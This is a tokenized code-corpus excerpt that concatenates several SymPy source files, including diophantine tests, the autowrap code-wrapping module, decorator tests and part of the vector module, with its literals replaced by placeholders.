<EOL> assert list ( sum_of_powers ( <NUM_LIT:3> ** <NUM_LIT:5> , <NUM_LIT:3> , <NUM_LIT:1> ) ) == [ ] <EOL> assert list ( sum_of_powers ( <NUM_LIT:3> ** <NUM_LIT:6> , <NUM_LIT:3> , <NUM_LIT:1> ) ) == [ ( <NUM_LIT:9> , ) ] and ( 
<NUM_LIT:9> ** <NUM_LIT:3> == <NUM_LIT:3> ** <NUM_LIT:6> ) <EOL> assert list ( sum_of_powers ( <NUM_LIT:2> ** <NUM_LIT:1000> , <NUM_LIT:5> , <NUM_LIT:2> ) ) == [ ] <EOL> def test__can_do_sum_of_squares ( ) : <EOL> assert _can_do_sum_of_squares ( <NUM_LIT:3> , - <NUM_LIT:1> ) is False <EOL> assert _can_do_sum_of_squares ( - <NUM_LIT:3> , <NUM_LIT:1> ) is False <EOL> assert _can_do_sum_of_squares ( <NUM_LIT:0> , <NUM_LIT:1> ) <EOL> assert _can_do_sum_of_squares ( <NUM_LIT:4> , <NUM_LIT:1> ) <EOL> assert _can_do_sum_of_squares ( <NUM_LIT:1> , <NUM_LIT:2> ) <EOL> assert _can_do_sum_of_squares ( <NUM_LIT:2> , <NUM_LIT:2> ) <EOL> assert _can_do_sum_of_squares ( <NUM_LIT:3> , <NUM_LIT:2> ) is False <EOL> def test_issue_9538 ( ) : <EOL> eq = x - <NUM_LIT:3> * y + <NUM_LIT:2> <EOL> assert diophantine ( eq , syms = [ y , x ] ) == set ( [ ( t_0 , <NUM_LIT:3> * t_0 - <NUM_LIT:2> ) ] ) <EOL> raises ( TypeError , lambda : diophantine ( eq , syms = set ( [ y , x ] ) ) ) </s>
<s> """<STR_LIT>""" <EOL> from . indexed import IndexedBase , Idx , Indexed <EOL> from . index_methods import get_contraction_structure , get_indices </s>
<s> """<STR_LIT>""" <EOL> from __future__ import print_function , division <EOL> _doctest_depends_on = { '<STR_LIT>' : ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , '<STR_LIT>' : ( '<STR_LIT>' , ) } <EOL> import sys <EOL> import os <EOL> import shutil <EOL> import tempfile <EOL> from subprocess import STDOUT , CalledProcessError , check_output <EOL> from string import Template <EOL> from sympy . core . cache import cacheit <EOL> from sympy . core . compatibility import range , iterable <EOL> from sympy . core . function import Lambda <EOL> from sympy . core . relational import Eq <EOL> from sympy . core . symbol import Dummy , Symbol <EOL> from sympy . tensor . indexed import Idx , IndexedBase <EOL> from sympy . utilities . codegen import ( make_routine , get_code_generator , <EOL> OutputArgument , InOutArgument , InputArgument , <EOL> CodeGenArgumentListError , Result , ResultBase , CCodeGen ) <EOL> from sympy . utilities . lambdify import implemented_function <EOL> from sympy . utilities . decorator import doctest_depends_on <EOL> class CodeWrapError ( Exception ) : <EOL> pass <EOL> class CodeWrapper ( object ) : <EOL> """<STR_LIT>""" <EOL> _filename = "<STR_LIT>" <EOL> _module_basename = "<STR_LIT>" <EOL> _module_counter = <NUM_LIT:0> <EOL> @ property <EOL> def filename ( self ) : <EOL> return "<STR_LIT>" % ( self . _filename , CodeWrapper . _module_counter ) <EOL> @ property <EOL> def module_name ( self ) : <EOL> return "<STR_LIT>" % ( self . _module_basename , CodeWrapper . _module_counter ) <EOL> def __init__ ( self , generator , filepath = None , flags = [ ] , verbose = False ) : <EOL> """<STR_LIT>""" <EOL> self . generator = generator <EOL> self . filepath = filepath <EOL> self . flags = flags <EOL> self . quiet = not verbose <EOL> @ property <EOL> def include_header ( self ) : <EOL> return bool ( self . filepath ) <EOL> @ property <EOL> def include_empty ( self ) : <EOL> return bool ( self . 
filepath ) <EOL> def _generate_code ( self , main_routine , routines ) : <EOL> routines . append ( main_routine ) <EOL> self . generator . write ( <EOL> routines , self . filename , True , self . include_header , <EOL> self . include_empty ) <EOL> def wrap_code ( self , routine , helpers = [ ] ) : <EOL> workdir = self . filepath or tempfile . mkdtemp ( "<STR_LIT>" ) <EOL> if not os . access ( workdir , os . F_OK ) : <EOL> os . mkdir ( workdir ) <EOL> oldwork = os . getcwd ( ) <EOL> os . chdir ( workdir ) <EOL> try : <EOL> sys . path . append ( workdir ) <EOL> self . _generate_code ( routine , helpers ) <EOL> self . _prepare_files ( routine ) <EOL> self . _process_files ( routine ) <EOL> mod = __import__ ( self . module_name ) <EOL> finally : <EOL> sys . path . remove ( workdir ) <EOL> CodeWrapper . _module_counter += <NUM_LIT:1> <EOL> os . chdir ( oldwork ) <EOL> if not self . filepath : <EOL> try : <EOL> shutil . rmtree ( workdir ) <EOL> except OSError : <EOL> pass <EOL> return self . _get_wrapped_function ( mod , routine . name ) <EOL> def _process_files ( self , routine ) : <EOL> command = self . command <EOL> command . extend ( self . flags ) <EOL> try : <EOL> retoutput = check_output ( command , stderr = STDOUT ) <EOL> except CalledProcessError as e : <EOL> raise CodeWrapError ( <EOL> "<STR_LIT>" % ( <EOL> "<STR_LIT:U+0020>" . join ( command ) , e . output . decode ( ) ) ) <EOL> if not self . quiet : <EOL> print ( retoutput ) <EOL> class DummyWrapper ( CodeWrapper ) : <EOL> """<STR_LIT>""" <EOL> template = """<STR_LIT>""" <EOL> def _prepare_files ( self , routine ) : <EOL> return <EOL> def _generate_code ( self , routine , helpers ) : <EOL> with open ( '<STR_LIT>' % self . module_name , '<STR_LIT:w>' ) as f : <EOL> printed = "<STR_LIT:U+002CU+0020>" . join ( <EOL> [ str ( res . expr ) for res in routine . result_variables ] ) <EOL> args = filter ( lambda x : not isinstance ( <EOL> x , OutputArgument ) , routine . 
arguments ) <EOL> retvals = [ ] <EOL> for val in routine . result_variables : <EOL> if isinstance ( val , Result ) : <EOL> retvals . append ( '<STR_LIT>' ) <EOL> else : <EOL> retvals . append ( val . result_var ) <EOL> print ( DummyWrapper . template % { <EOL> '<STR_LIT:name>' : routine . name , <EOL> '<STR_LIT>' : printed , <EOL> '<STR_LIT:args>' : "<STR_LIT:U+002CU+0020>" . join ( [ str ( a . name ) for a in args ] ) , <EOL> '<STR_LIT>' : "<STR_LIT:U+002CU+0020>" . join ( [ str ( val ) for val in retvals ] ) <EOL> } , end = "<STR_LIT>" , file = f ) <EOL> def _process_files ( self , routine ) : <EOL> return <EOL> @ classmethod <EOL> def _get_wrapped_function ( cls , mod , name ) : <EOL> return getattr ( mod , name ) <EOL> class CythonCodeWrapper ( CodeWrapper ) : <EOL> """<STR_LIT>""" <EOL> setup_template = ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT:\n>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> pyx_imports = ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> pyx_header = ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> pyx_func = ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT:\n>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> super ( CythonCodeWrapper , self ) . __init__ ( * args , ** kwargs ) <EOL> self . _need_numpy = False <EOL> @ property <EOL> def command ( self ) : <EOL> command = [ sys . executable , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] <EOL> return command <EOL> def _prepare_files ( self , routine ) : <EOL> pyxfilename = self . module_name + '<STR_LIT>' <EOL> codefilename = "<STR_LIT>" % ( self . filename , self . generator . code_extension ) <EOL> with open ( pyxfilename , '<STR_LIT:w>' ) as f : <EOL> self . dump_pyx ( [ routine ] , f , self . filename ) <EOL> ext_args = [ repr ( self . 
module_name ) , repr ( [ pyxfilename , codefilename ] ) ] <EOL> if self . _need_numpy : <EOL> np_import = '<STR_LIT>' <EOL> np_includes = '<STR_LIT>' <EOL> else : <EOL> np_import = '<STR_LIT>' <EOL> np_includes = '<STR_LIT>' <EOL> with open ( '<STR_LIT>' , '<STR_LIT:w>' ) as f : <EOL> f . write ( self . setup_template . format ( ext_args = "<STR_LIT:U+002CU+0020>" . join ( ext_args ) , <EOL> np_import = np_import , <EOL> np_includes = np_includes ) ) <EOL> @ classmethod <EOL> def _get_wrapped_function ( cls , mod , name ) : <EOL> return getattr ( mod , name + '<STR_LIT>' ) <EOL> def dump_pyx ( self , routines , f , prefix ) : <EOL> """<STR_LIT>""" <EOL> headers = [ ] <EOL> functions = [ ] <EOL> for routine in routines : <EOL> prototype = self . generator . get_prototype ( routine ) <EOL> headers . append ( self . pyx_header . format ( header_file = prefix , <EOL> prototype = prototype ) ) <EOL> py_rets , py_args , py_loc , py_inf = self . _partition_args ( routine . arguments ) <EOL> name = routine . name <EOL> arg_string = "<STR_LIT:U+002CU+0020>" . join ( self . _prototype_arg ( arg ) for arg in py_args ) <EOL> local_decs = [ ] <EOL> for arg , val in py_inf . items ( ) : <EOL> proto = self . _prototype_arg ( arg ) <EOL> mat , ind = val <EOL> local_decs . append ( "<STR_LIT>" . format ( proto , mat , ind ) ) <EOL> local_decs . extend ( [ "<STR_LIT>" . format ( self . _declare_arg ( a ) ) for a in py_loc ] ) <EOL> declarations = "<STR_LIT:\n>" . join ( local_decs ) <EOL> if declarations : <EOL> declarations = declarations + "<STR_LIT:\n>" <EOL> args_c = "<STR_LIT:U+002CU+0020>" . join ( [ self . _call_arg ( a ) for a in routine . arguments ] ) <EOL> rets = "<STR_LIT:U+002CU+0020>" . join ( [ str ( r . name ) for r in py_rets ] ) <EOL> if routine . results : <EOL> body = '<STR_LIT>' % ( routine . name , args_c ) <EOL> if rets : <EOL> body = body + '<STR_LIT:U+002CU+0020>' + rets <EOL> else : <EOL> body = '<STR_LIT>' % ( routine . 
name , args_c ) <EOL> body = body + '<STR_LIT>' + rets <EOL> functions . append ( self . pyx_func . format ( name = name , arg_string = arg_string , <EOL> declarations = declarations , body = body ) ) <EOL> if self . _need_numpy : <EOL> f . write ( self . pyx_imports ) <EOL> f . write ( '<STR_LIT:\n>' . join ( headers ) ) <EOL> f . write ( '<STR_LIT:\n>' . join ( functions ) ) <EOL> def _partition_args ( self , args ) : <EOL> """<STR_LIT>""" <EOL> py_args = [ ] <EOL> py_returns = [ ] <EOL> py_locals = [ ] <EOL> py_inferred = { } <EOL> for arg in args : <EOL> if isinstance ( arg , OutputArgument ) : <EOL> py_returns . append ( arg ) <EOL> py_locals . append ( arg ) <EOL> elif isinstance ( arg , InOutArgument ) : <EOL> py_returns . append ( arg ) <EOL> py_args . append ( arg ) <EOL> else : <EOL> py_args . append ( arg ) <EOL> if isinstance ( arg , ( InputArgument , InOutArgument ) ) and arg . dimensions : <EOL> dims = [ d [ <NUM_LIT:1> ] + <NUM_LIT:1> for d in arg . dimensions ] <EOL> sym_dims = [ ( i , d ) for ( i , d ) in enumerate ( dims ) if isinstance ( d , Symbol ) ] <EOL> for ( i , d ) in sym_dims : <EOL> py_inferred [ d ] = ( arg . name , i ) <EOL> for arg in args : <EOL> if arg . name in py_inferred : <EOL> py_inferred [ arg ] = py_inferred . pop ( arg . name ) <EOL> py_args = [ a for a in py_args if a not in py_inferred ] <EOL> return py_returns , py_args , py_locals , py_inferred <EOL> def _prototype_arg ( self , arg ) : <EOL> mat_dec = "<STR_LIT>" <EOL> np_types = { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:int>' : '<STR_LIT>' } <EOL> t = arg . get_datatype ( '<STR_LIT:c>' ) <EOL> if arg . dimensions : <EOL> self . _need_numpy = True <EOL> ndim = len ( arg . dimensions ) <EOL> mtype = np_types [ t ] <EOL> return mat_dec . format ( mtype = mtype , ndim = ndim , name = arg . name ) <EOL> else : <EOL> return "<STR_LIT>" % ( t , str ( arg . name ) ) <EOL> def _declare_arg ( self , arg ) : <EOL> proto = self . _prototype_arg ( arg ) <EOL> if arg . 
dimensions : <EOL> shape = '<STR_LIT:(>' + '<STR_LIT:U+002C>' . join ( str ( i [ <NUM_LIT:1> ] + <NUM_LIT:1> ) for i in arg . dimensions ) + '<STR_LIT:)>' <EOL> return proto + "<STR_LIT>" . format ( shape = shape ) <EOL> else : <EOL> return proto + "<STR_LIT>" <EOL> def _call_arg ( self , arg ) : <EOL> if arg . dimensions : <EOL> t = arg . get_datatype ( '<STR_LIT:c>' ) <EOL> return "<STR_LIT>" . format ( t , arg . name ) <EOL> elif isinstance ( arg , ResultBase ) : <EOL> return "<STR_LIT>" . format ( arg . name ) <EOL> else : <EOL> return str ( arg . name ) <EOL> class F2PyCodeWrapper ( CodeWrapper ) : <EOL> """<STR_LIT>""" <EOL> @ property <EOL> def command ( self ) : <EOL> filename = self . filename + '<STR_LIT:.>' + self . generator . code_extension <EOL> args = [ '<STR_LIT:-c>' , '<STR_LIT>' , self . module_name , filename ] <EOL> command = [ sys . executable , "<STR_LIT:-c>" , "<STR_LIT>" ] + args <EOL> return command <EOL> def _prepare_files ( self , routine ) : <EOL> pass <EOL> @ classmethod <EOL> def _get_wrapped_function ( cls , mod , name ) : <EOL> return getattr ( mod , name ) <EOL> def _get_code_wrapper_class ( backend ) : <EOL> wrappers = { '<STR_LIT>' : F2PyCodeWrapper , '<STR_LIT>' : CythonCodeWrapper , <EOL> '<STR_LIT>' : DummyWrapper } <EOL> return wrappers [ backend . upper ( ) ] <EOL> _lang_lookup = { '<STR_LIT>' : ( '<STR_LIT:C>' , ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , ) , <EOL> '<STR_LIT>' : ( '<STR_LIT:C>' , ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , ) } <EOL> def _infer_language ( backend ) : <EOL> """<STR_LIT>""" <EOL> langs = _lang_lookup . get ( backend . upper ( ) , False ) <EOL> if not langs : <EOL> raise ValueError ( "<STR_LIT>" + backend ) <EOL> return langs [ <NUM_LIT:0> ] <EOL> def _validate_backend_language ( backend , language ) : <EOL> """<STR_LIT>""" <EOL> langs = _lang_lookup . get ( backend . upper ( ) , False ) <EOL> if not langs : <EOL> raise ValueError ( "<STR_LIT>" + backend ) <EOL> if language . 
upper ( ) not in langs : <EOL> raise ValueError ( ( "<STR_LIT>" <EOL> "<STR_LIT>" ) . format ( backend , language ) ) <EOL> @ cacheit <EOL> @ doctest_depends_on ( exe = ( '<STR_LIT>' , '<STR_LIT>' ) , modules = ( '<STR_LIT>' , ) ) <EOL> def autowrap ( <EOL> expr , language = None , backend = '<STR_LIT>' , tempdir = None , args = None , flags = None , <EOL> verbose = False , helpers = None ) : <EOL> """<STR_LIT>""" <EOL> if language : <EOL> _validate_backend_language ( backend , language ) <EOL> else : <EOL> language = _infer_language ( backend ) <EOL> helpers = [ helpers ] if helpers else ( ) <EOL> flags = flags if flags else ( ) <EOL> args = list ( args ) if iterable ( args , exclude = set ) else args <EOL> code_generator = get_code_generator ( language , "<STR_LIT>" ) <EOL> CodeWrapperClass = _get_code_wrapper_class ( backend ) <EOL> code_wrapper = CodeWrapperClass ( code_generator , tempdir , flags , verbose ) <EOL> helps = [ ] <EOL> for name_h , expr_h , args_h in helpers : <EOL> helps . append ( make_routine ( name_h , expr_h , args_h ) ) <EOL> for name_h , expr_h , args_h in helpers : <EOL> if expr . has ( expr_h ) : <EOL> name_h = binary_function ( name_h , expr_h , backend = '<STR_LIT>' ) <EOL> expr = expr . subs ( expr_h , name_h ( * args_h ) ) <EOL> try : <EOL> routine = make_routine ( '<STR_LIT>' , expr , args ) <EOL> except CodeGenArgumentListError as e : <EOL> new_args = [ ] <EOL> for missing in e . missing_args : <EOL> if not isinstance ( missing , OutputArgument ) : <EOL> raise <EOL> new_args . append ( missing . name ) <EOL> routine = make_routine ( '<STR_LIT>' , expr , args + new_args ) <EOL> return code_wrapper . 
wrap_code ( routine , helpers = helps ) <EOL> @ doctest_depends_on ( exe = ( '<STR_LIT>' , '<STR_LIT>' ) , modules = ( '<STR_LIT>' , ) ) <EOL> def binary_function ( symfunc , expr , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> binary = autowrap ( expr , ** kwargs ) <EOL> return implemented_function ( symfunc , binary ) <EOL> _ufunc_top = Template ( """<STR_LIT>""" ) <EOL> _ufunc_body = Template ( """<STR_LIT>""" ) <EOL> _ufunc_bottom = Template ( """<STR_LIT>""" ) <EOL> _ufunc_init_form = Template ( """<STR_LIT>""" ) <EOL> _ufunc_setup = Template ( """<STR_LIT>""" ) <EOL> class UfuncifyCodeWrapper ( CodeWrapper ) : <EOL> """<STR_LIT>""" <EOL> @ property <EOL> def command ( self ) : <EOL> command = [ sys . executable , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] <EOL> return command <EOL> def _prepare_files ( self , routine ) : <EOL> codefilename = self . module_name + '<STR_LIT>' <EOL> with open ( codefilename , '<STR_LIT:w>' ) as f : <EOL> self . dump_c ( [ routine ] , f , self . filename ) <EOL> with open ( '<STR_LIT>' , '<STR_LIT:w>' ) as f : <EOL> self . dump_setup ( f ) <EOL> @ classmethod <EOL> def _get_wrapped_function ( cls , mod , name ) : <EOL> return getattr ( mod , name ) <EOL> def dump_setup ( self , f ) : <EOL> setup = _ufunc_setup . substitute ( module = self . module_name , <EOL> filename = self . filename ) <EOL> f . write ( setup ) <EOL> def dump_c ( self , routines , f , prefix ) : <EOL> """<STR_LIT>""" <EOL> functions = [ ] <EOL> function_creation = [ ] <EOL> ufunc_init = [ ] <EOL> module = self . module_name <EOL> include_file = "<STR_LIT>" . format ( prefix ) <EOL> top = _ufunc_top . substitute ( include_file = include_file , module = module ) <EOL> for r_index , routine in enumerate ( routines ) : <EOL> name = routine . name <EOL> py_in , py_out = self . _partition_args ( routine . arguments ) <EOL> n_in = len ( py_in ) <EOL> n_out = <NUM_LIT:1> <EOL> form = "<STR_LIT>" <EOL> arg_decs = [ form . 
format ( '<STR_LIT>' , i , i ) for i in range ( n_in ) ] <EOL> arg_decs . append ( form . format ( '<STR_LIT>' , <NUM_LIT:1> , n_in ) ) <EOL> declare_args = '<STR_LIT>' . join ( arg_decs ) <EOL> form = "<STR_LIT>" <EOL> step_decs = [ form . format ( '<STR_LIT>' , i , i ) for i in range ( n_in ) ] <EOL> step_decs . append ( form . format ( '<STR_LIT>' , <NUM_LIT:1> , n_in ) ) <EOL> declare_steps = '<STR_LIT>' . join ( step_decs ) <EOL> form = "<STR_LIT>" <EOL> call_args = '<STR_LIT:U+002CU+0020>' . join ( [ form . format ( a ) for a in range ( n_in ) ] ) <EOL> form = "<STR_LIT>" <EOL> step_incs = [ form . format ( '<STR_LIT>' , i ) for i in range ( n_in ) ] <EOL> step_incs . append ( form . format ( '<STR_LIT>' , <NUM_LIT:1> ) ) <EOL> step_increments = '<STR_LIT>' . join ( step_incs ) <EOL> n_types = n_in + n_out <EOL> types = "<STR_LIT:{>" + '<STR_LIT:U+002CU+0020>' . join ( [ "<STR_LIT>" ] * n_types ) + "<STR_LIT>" <EOL> docstring = '<STR_LIT>' <EOL> function_creation . append ( "<STR_LIT>" . format ( r_index ) ) <EOL> init_form = _ufunc_init_form . substitute ( module = module , <EOL> funcname = name , <EOL> docstring = docstring , <EOL> n_in = n_in , n_out = n_out , <EOL> ind = r_index ) <EOL> ufunc_init . append ( init_form ) <EOL> body = _ufunc_body . substitute ( module = module , funcname = name , <EOL> declare_args = declare_args , <EOL> declare_steps = declare_steps , <EOL> call_args = call_args , <EOL> step_increments = step_increments , <EOL> n_types = n_types , types = types ) <EOL> functions . append ( body ) <EOL> body = '<STR_LIT>' . join ( functions ) <EOL> ufunc_init = '<STR_LIT>' . join ( ufunc_init ) <EOL> function_creation = '<STR_LIT>' . join ( function_creation ) <EOL> bottom = _ufunc_bottom . substitute ( module = module , <EOL> ufunc_init = ufunc_init , <EOL> function_creation = function_creation ) <EOL> text = [ top , body , bottom ] <EOL> f . write ( '<STR_LIT>' . 
join ( text ) ) <EOL> def _partition_args ( self , args ) : <EOL> """<STR_LIT>""" <EOL> py_in = [ ] <EOL> py_out = [ ] <EOL> for arg in args : <EOL> if isinstance ( arg , OutputArgument ) : <EOL> if py_out : <EOL> msg = "<STR_LIT>" <EOL> raise ValueError ( msg ) <EOL> py_out . append ( arg ) <EOL> elif isinstance ( arg , InOutArgument ) : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> else : <EOL> py_in . append ( arg ) <EOL> return py_in , py_out <EOL> @ cacheit <EOL> @ doctest_depends_on ( exe = ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , modules = ( '<STR_LIT>' , ) ) <EOL> def ufuncify ( args , expr , language = None , backend = '<STR_LIT>' , tempdir = None , <EOL> flags = None , verbose = False , helpers = None ) : <EOL> """<STR_LIT>""" <EOL> if isinstance ( args , Symbol ) : <EOL> args = ( args , ) <EOL> else : <EOL> args = tuple ( args ) <EOL> if language : <EOL> _validate_backend_language ( backend , language ) <EOL> else : <EOL> language = _infer_language ( backend ) <EOL> helpers = helpers if helpers else ( ) <EOL> flags = flags if flags else ( ) <EOL> if backend . upper ( ) == '<STR_LIT>' : <EOL> routine = make_routine ( '<STR_LIT>' , expr , args ) <EOL> helps = [ ] <EOL> for name , expr , args in helpers : <EOL> helps . append ( make_routine ( name , expr , args ) ) <EOL> code_wrapper = UfuncifyCodeWrapper ( CCodeGen ( "<STR_LIT>" ) , tempdir , <EOL> flags , verbose ) <EOL> return code_wrapper . wrap_code ( routine , helpers = helps ) <EOL> else : <EOL> y = IndexedBase ( Dummy ( ) ) <EOL> m = Dummy ( integer = True ) <EOL> i = Idx ( Dummy ( integer = True ) , m ) <EOL> f = implemented_function ( Dummy ( ) . name , Lambda ( args , expr ) ) <EOL> indexed_args = [ IndexedBase ( Dummy ( str ( a ) ) ) for a in args ] <EOL> args = [ y ] + indexed_args + [ m ] <EOL> args_with_indices = [ a [ i ] for a in indexed_args ] <EOL> return autowrap ( Eq ( y [ i ] , f ( * args_with_indices ) ) , language , backend , <EOL> tempdir , args , flags , verbose , helpers ) </s>
<s> from sympy . utilities . decorator import threaded , xthreaded <EOL> from sympy import Eq , Matrix <EOL> from sympy . abc import x , y <EOL> from sympy . core . decorators import wraps <EOL> def test_threaded ( ) : <EOL> @ threaded <EOL> def function ( expr , * args ) : <EOL> return <NUM_LIT:2> * expr + sum ( args ) <EOL> assert function ( Matrix ( [ [ x , y ] , [ <NUM_LIT:1> , x ] ] ) , <NUM_LIT:1> , <NUM_LIT:2> ) == Matrix ( [ [ <NUM_LIT:2> * x + <NUM_LIT:3> , <NUM_LIT:2> * y + <NUM_LIT:3> ] , [ <NUM_LIT:5> , <NUM_LIT:2> * x + <NUM_LIT:3> ] ] ) <EOL> assert function ( Eq ( x , y ) , <NUM_LIT:1> , <NUM_LIT:2> ) == Eq ( <NUM_LIT:2> * x + <NUM_LIT:3> , <NUM_LIT:2> * y + <NUM_LIT:3> ) <EOL> assert function ( [ x , y ] , <NUM_LIT:1> , <NUM_LIT:2> ) == [ <NUM_LIT:2> * x + <NUM_LIT:3> , <NUM_LIT:2> * y + <NUM_LIT:3> ] <EOL> assert function ( ( x , y ) , <NUM_LIT:1> , <NUM_LIT:2> ) == ( <NUM_LIT:2> * x + <NUM_LIT:3> , <NUM_LIT:2> * y + <NUM_LIT:3> ) <EOL> assert function ( { x , y } , <NUM_LIT:1> , <NUM_LIT:2> ) == { <NUM_LIT:2> * x + <NUM_LIT:3> , <NUM_LIT:2> * y + <NUM_LIT:3> } <EOL> @ threaded <EOL> def function ( expr , n ) : <EOL> return expr ** n <EOL> assert function ( x + y , <NUM_LIT:2> ) == x ** <NUM_LIT:2> + y ** <NUM_LIT:2> <EOL> assert function ( x , <NUM_LIT:2> ) == x ** <NUM_LIT:2> <EOL> def test_xthreaded ( ) : <EOL> @ xthreaded <EOL> def function ( expr , n ) : <EOL> return expr ** n <EOL> assert function ( x + y , <NUM_LIT:2> ) == ( x + y ) ** <NUM_LIT:2> <EOL> def test_wraps ( ) : <EOL> def my_func ( x ) : <EOL> """<STR_LIT>""" <EOL> my_func . is_my_func = True <EOL> new_my_func = threaded ( my_func ) <EOL> new_my_func = wraps ( my_func ) ( new_my_func ) <EOL> assert new_my_func . __name__ == '<STR_LIT>' <EOL> assert new_my_func . __doc__ == '<STR_LIT>' <EOL> assert hasattr ( new_my_func , '<STR_LIT>' ) <EOL> assert new_my_func . is_my_func is True </s>
<s> from sympy . core . assumptions import StdFactKB <EOL> from sympy . core import S , Pow , Symbol <EOL> from sympy . core . expr import AtomicExpr <EOL> from sympy . core . compatibility import range <EOL> from sympy import diff as df , sqrt , ImmutableMatrix as Matrix <EOL> from sympy . vector . coordsysrect import CoordSysCartesian <EOL> from sympy . vector . basisdependent import ( BasisDependent , BasisDependentAdd , <EOL> BasisDependentMul , BasisDependentZero ) <EOL> from sympy . vector . dyadic import BaseDyadic , Dyadic , DyadicAdd <EOL> from sympy . core . compatibility import u <EOL> class Vector ( BasisDependent ) : <EOL> """<STR_LIT>""" <EOL> is_Vector = True <EOL> _op_priority = <NUM_LIT> <EOL> @ property <EOL> def components ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _components <EOL> def magnitude ( self ) : <EOL> """<STR_LIT>""" <EOL> return sqrt ( self & self ) <EOL> def normalize ( self ) : <EOL> """<STR_LIT>""" <EOL> return self / self . magnitude ( ) <EOL> def dot ( self , other ) : <EOL> """<STR_LIT>""" <EOL> from sympy . vector . functions import express <EOL> if isinstance ( other , Dyadic ) : <EOL> if isinstance ( self , VectorZero ) : <EOL> return Vector . zero <EOL> outvec = Vector . zero <EOL> for k , v in other . components . items ( ) : <EOL> vect_dot = k . args [ <NUM_LIT:0> ] . dot ( self ) <EOL> outvec += vect_dot * v * k . args [ <NUM_LIT:1> ] <EOL> return outvec <EOL> from sympy . vector . deloperator import Del <EOL> if not isinstance ( other , Vector ) and not isinstance ( other , Del ) : <EOL> raise TypeError ( str ( other ) + "<STR_LIT>" + <EOL> "<STR_LIT>" ) <EOL> if isinstance ( other , Del ) : <EOL> def directional_derivative ( field ) : <EOL> field = express ( field , other . system , variables = True ) <EOL> out = self . dot ( other . _i ) * df ( field , other . _x ) <EOL> out += self . dot ( other . _j ) * df ( field , other . _y ) <EOL> out += self . dot ( other . _k ) * df ( field , other . 
_z ) <EOL> if out == <NUM_LIT:0> and isinstance ( field , Vector ) : <EOL> out = Vector . zero <EOL> return out <EOL> return directional_derivative <EOL> if isinstance ( self , VectorZero ) or isinstance ( other , VectorZero ) : <EOL> return S ( <NUM_LIT:0> ) <EOL> v1 = express ( self , other . _sys ) <EOL> v2 = express ( other , other . _sys ) <EOL> dotproduct = S ( <NUM_LIT:0> ) <EOL> for x in other . _sys . base_vectors ( ) : <EOL> dotproduct += ( v1 . components . get ( x , <NUM_LIT:0> ) * <EOL> v2 . components . get ( x , <NUM_LIT:0> ) ) <EOL> return dotproduct <EOL> def __and__ ( self , other ) : <EOL> return self . dot ( other ) <EOL> __and__ . __doc__ = dot . __doc__ <EOL> def cross ( self , other ) : <EOL> """<STR_LIT>""" <EOL> if isinstance ( other , Dyadic ) : <EOL> if isinstance ( self , VectorZero ) : <EOL> return Dyadic . zero <EOL> outdyad = Dyadic . zero <EOL> for k , v in other . components . items ( ) : <EOL> cross_product = self . cross ( k . args [ <NUM_LIT:0> ] ) <EOL> outer = cross_product . outer ( k . args [ <NUM_LIT:1> ] ) <EOL> outdyad += v * outer <EOL> return outdyad <EOL> elif not isinstance ( other , Vector ) : <EOL> raise TypeError ( str ( other ) + "<STR_LIT>" ) <EOL> elif ( isinstance ( self , VectorZero ) or <EOL> isinstance ( other , VectorZero ) ) : <EOL> return Vector . 
zero <EOL> def _det ( mat ) : <EOL> """<STR_LIT>""" <EOL> return ( mat [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] * ( mat [ <NUM_LIT:1> ] [ <NUM_LIT:1> ] * mat [ <NUM_LIT:2> ] [ <NUM_LIT:2> ] - mat [ <NUM_LIT:1> ] [ <NUM_LIT:2> ] * <EOL> mat [ <NUM_LIT:2> ] [ <NUM_LIT:1> ] ) + <EOL> mat [ <NUM_LIT:0> ] [ <NUM_LIT:1> ] * ( mat [ <NUM_LIT:1> ] [ <NUM_LIT:2> ] * mat [ <NUM_LIT:2> ] [ <NUM_LIT:0> ] - mat [ <NUM_LIT:1> ] [ <NUM_LIT:0> ] * <EOL> mat [ <NUM_LIT:2> ] [ <NUM_LIT:2> ] ) + <EOL> mat [ <NUM_LIT:0> ] [ <NUM_LIT:2> ] * ( mat [ <NUM_LIT:1> ] [ <NUM_LIT:0> ] * mat [ <NUM_LIT:2> ] [ <NUM_LIT:1> ] - mat [ <NUM_LIT:1> ] [ <NUM_LIT:1> ] * <EOL> mat [ <NUM_LIT:2> ] [ <NUM_LIT:0> ] ) ) <EOL> outvec = Vector . zero <EOL> for system , vect in other . separate ( ) . items ( ) : <EOL> tempi = system . i <EOL> tempj = system . j <EOL> tempk = system . k <EOL> tempm = [ [ tempi , tempj , tempk ] , <EOL> [ self & tempi , self & tempj , self & tempk ] , <EOL> [ vect & tempi , vect & tempj , vect & tempk ] ] <EOL> outvec += _det ( tempm ) <EOL> return outvec <EOL> def __xor__ ( self , other ) : <EOL> return self . cross ( other ) <EOL> __xor__ . __doc__ = cross . __doc__ <EOL> def outer ( self , other ) : <EOL> """<STR_LIT>""" <EOL> if not isinstance ( other , Vector ) : <EOL> raise TypeError ( "<STR_LIT>" ) <EOL> elif ( isinstance ( self , VectorZero ) or <EOL> isinstance ( other , VectorZero ) ) : <EOL> return Dyadic . zero <EOL> args = [ ] <EOL> for k1 , v1 in self . components . items ( ) : <EOL> for k2 , v2 in other . components . items ( ) : <EOL> 